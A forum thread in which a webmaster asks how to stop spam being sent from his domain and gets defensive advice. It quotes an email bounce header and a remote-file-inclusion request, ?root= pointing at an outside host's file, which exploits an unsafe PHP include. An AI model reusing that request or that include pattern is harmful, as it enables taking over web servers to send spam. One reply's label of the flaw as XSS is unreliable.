I had my account suspended many times for sending spam which I do not send. And I need to find out how to protect my domains. This is one of the many returned spams to my mailbox and its header: Return-path: <> Envelope-to: [email]webmaste@webmaster-money.org[/email] Delivery-date: Thu, 02 Sep 2010 08:48:21 -0400 Received: from mail by dex178.exmasters.com with local (Exim 4.67) id 1Or9DJ-000114-KJ for [email]webmaste@webmaster-money.org[/email]; Thu, 02 Sep 2010 08:48:21 -0400 X-Failed-Recipients: [email]crantok1@hotmail.com[/email] Auto-Submitted: auto-replied From: Mail Delivery System To: [email]webmaste@webmaster-money.org[/email] Subject: Mail delivery failed: returning message to sender Message-Id: Date: Thu, 02 Sep 2010 08:48:21 -0400 This message was created automatically by mail delivery software. A message that you sent could not be delivered to one or more of its recipients. This is a permanent error. The following address(es) failed: [email]crantok1@hotmail.com[/email] SMTP error from remote mail server after MAIL FROM: SIZE=4262: host mx3.hotmail.com [65.54.188.110]: 550 SC-001 Mail rejected by Windows Live Hotmail for policy reasons. Reasons for rejection may be related to content with spam-like characteristics or IP/domain reputation problems. If you are not an email/network admin please contact your E-mail/Internet Service Provider for help. Email/network admins, please visit [url]http://postmaster.live.com[/url] for email delivery information and support ------ This is a copy of the message, including all the headers. ------ Return-path: Received: from apache by dex178.exmasters.com with local (Exim 4.67) (envelope-from ) id 1OqsVm-0007Cu-QF for [email]crantok1@hotmail.com[/email]; Wed, 01 Sep 2010 14:58:18 -0400 To: [email]crantok1@hotmail.com[/email] Subject: This is Important , Please Get Back To Me X-PHP-Script: [url]www.webmaster- money.org/index.php[/url] for 82.128.80.42 From: New Zealand Oil and Gas Reply-To: [email]chris_roberta@hotmail.co.nz[/email] MIME-Version: 1.0 Content-Type: text/html Content-Transfer-Encoding: 8bit Message-Id: Date: Wed, 01 Sep 2010 14:58:18 -0400 Code (markup): And I think this is also somehow connected to the problem: http://www.webmaster-money.org/index.php?root=http://sports-wear.com.my/likchin/images/tst.gif??? Code (markup): open it also with those question marks... How can I protect myself? Some htaccess will help or some server settings? I need to use that domain for sending mails also so stopping all mail functions is not solution.
There are a lot of ways spam can be sent from your domain. Go through the software on your site - delete old programs you no longer use. If you use any old php formmail programs upgrade them to "tectite php formmail" - very secure and updated regularly. If you have any custom scripts that send mail either get rid of them or have them updated to be secure. Check for unknown scripts or programs that may have been uploaded by an intruder - delete those and try to ascertain and plug the means of intrusion. While you're at it check your database content for anything unusual that might show signs of mysql injection having taken place. In other words.. you probably want to hire someone very knowledgeable to have a look at things for you. Judging from the code you mention and from this "X-PHP-Script: www dot webmaster- money dot org index php" - the problem you're mentioning now (there could be others) is definitely coming from your index file. That begs me to ask are you still running with register globals enabled? If so turn it off. If the index php script has a variable $root - be sure it is set properly so that it can't be overwritten from the url string ?root= being applied to your site. (even though turning off register globals should prevent this it's still a good idea to properly assign and check variables to be sure someone hasn't poisoned the data in order to use your program for something you didn't intend) Good luck.
Appears you site may have a XSS exploit. You will want to see if there are updates for the web application software you are using. See http://en.wikipedia.org/wiki/Cross-site_scripting for more details on XSS exploits.
I found possible problem already... thank you for your inputs... I used include "$root/xxx.php" and this made it somehow possible... also my host disallowed opening/including external files. So now it should be working fine. Now I am checking if I get bounced mails.
That's a big can of worms, good they're turning that off. Success? Most spam blacklists will release you automatically from the list 24-48 hours after they've stopped seeing spam come from your machine. Some are a little stickier so there may be the odd person out there who still won't receive your messages for a while longer. Glad to hear things are getting figured out